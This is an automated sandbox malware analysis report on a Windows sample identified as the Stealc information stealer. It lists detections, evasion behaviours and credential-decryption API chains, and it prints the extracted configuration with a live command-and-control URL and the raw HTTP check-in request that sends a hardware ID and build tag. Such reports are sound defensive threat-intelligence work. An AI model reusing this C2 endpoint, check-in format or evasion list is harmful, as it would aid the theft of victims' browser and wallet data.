Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559918
MD5:3b43c7942554833f316cf7108b571f8b
SHA1:f6f15b0a739eac16980144cbc1b7e2579fe9141a
SHA256:a782058a0f3fe32eddc56aa22a302f5c1d7f718e434cf2c547336ace69a680e2
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3668 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3B43C7942554833F316CF7108B571F8B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3668JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3668JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:15.183425+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.3668.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_000A4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_000C40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_000A60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_000B6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000AEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_000AEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_000A9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_000B6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000A9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000A7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_000B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_000BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000A16B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJEHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 37 32 39 38 32 30 37 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"24729820740F807656615------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"mars------AAKJKJDGCGDBGDHIJKJE--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_000A6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJEHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 37 32 39 38 32 30 37 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"24729820740F807656615------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"mars------AAKJKJDGCGDBGDHIJKJE--
              Source: file.exe, 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/)
              Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/;
              Source: file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpT
              Source: file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
              Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_000A9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003090950_2_00309095
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C48B00_2_000C48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C9510_2_0045C951
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004541050_2_00454105
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004591300_2_00459130
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004582C00_2_004582C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C42DB0_2_003C42DB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004633520_2_00463352
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045E44E0_2_0045E44E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00456C010_2_00456C01
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A34EC0_2_003A34EC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00464D680_2_00464D68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045AD190_2_0045AD19
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D46360_2_003D4636
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004666B30_2_004666B3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509F010_2_00509F01
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C07F50_2_004C07F5
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 000A4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
